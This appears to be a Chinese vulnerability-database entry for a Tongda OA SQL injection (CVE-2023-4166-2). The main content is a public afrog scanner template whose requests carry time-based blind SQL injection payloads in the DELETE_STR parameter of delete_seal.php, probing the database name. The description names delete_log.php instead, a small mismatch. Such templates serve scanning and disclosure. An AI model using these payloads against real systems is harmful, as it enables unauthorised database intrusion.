CVE-2023-4166-2: 通达OA seal_manage SQL 注入

日期: 2025-09-01 | 影响软件: 通达OA | POC: 已公开

漏洞描述

该漏洞影响文件general/system/seal_manage/dianju/delete_log.php的未知代码。对参数 DELETE_STR 的操作会导致 sql 注入。

PoC代码[已公开]

id: CVE-2023-4166-2

info:
  name: 通达OA seal_manage SQL 注入
  author: zan8in
  severity: high
  verified: true
  description: |-
    该漏洞影响文件general/system/seal_manage/dianju/delete_log.php的未知代码。对参数 DELETE_STR 的操作会导致 sql 注入。
  reference:
    - https://mp.weixin.qq.com/s/37VKi2Az7LX9G9wVYe6POQ
    - https://mp.weixin.qq.com/s/VoSGMmGOaichZESFa51iRw
    - https://mp.weixin.qq.com/s/HE1HgzXSGcBCG_3s_UJb0g
  tags: cve,cve2023,tongda,oa,sqli
  created: 2023/08/07

rules:
  r00:
    request:
      method: GET
      path: /general/system/seal_manage/dianju/log.php?start=
    expression: response.status == 200 && response.body.bcontains(b'<title>印章日志</title>')
  r0:
    request:
      method: GET
      path: /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1
    expression: response.status == 302
    output:
      t1: response.latency
  r1:
    request:
      method: GET
      path: /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(115)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1
      headers:
        t1: "{{t1}}"
    expression: response.status == 302  && response.latency <= t1/2
    output:
      t2: response.latency
  r2:
    request:
      method: GET
      path: /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),2,1))=char(100)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1
      headers:
        t2: "{{t2}}"
    expression: response.status == 302 && response.latency >= (t1-500)
    output:
      t3: response.latency
  r3:
    request:
      method: GET
      path: /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),2,1))=char(101)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1
      headers:
        t3: "{{t3}}"
    expression: response.status == 302 && response.latency <= t1/2
    output:
      t4: response.latency
  r4:
    request:
      method: GET
      path: /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),3,1))=char(95)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1
      headers:
        t4: "{{t4}}"
    expression: response.status == 302 && response.latency >= (t1-500)
    output:
      t5: response.latency
  r5:
    request:
      method: GET
      path: /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),3,1))=char(96)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1
      headers:
        t5: "{{t5}}"
    expression: response.status == 302 && response.latency <= t1/2
expression: r00() && r0() && r1() && r2() && r3() && r4() && r5()

来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/CVE/2023/CVE-2023-4166-2.yaml

漏洞描述

PoC代码[已公开]

相关漏洞推荐

通达OA v11.7 delete_cascade.php SQL 注入漏洞 无POC

通达OA /general/reportshop/utils/upload.php 文件上传漏洞（CNVD-2021-21890） 无POC

通达OA delete_seal.php SQL 注入漏洞（CVE-2023-4165） 无POC

PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637） 无POC

PrestaShop SQL 注入漏洞（CVE-2023-46358） 无POC

通达OA v11.7 delete_cascade.php SQL 注入漏洞无POC

通达OA /general/reportshop/utils/upload.php 文件上传漏洞（CNVD-2021-21890）无POC

通达OA delete_seal.php SQL 注入漏洞（CVE-2023-4165）无POC

PrestaShop /module/tshirtecommerce/designer SQL 注入漏洞（CVE-2023-27637）无POC

PrestaShop SQL 注入漏洞（CVE-2023-46358）无POC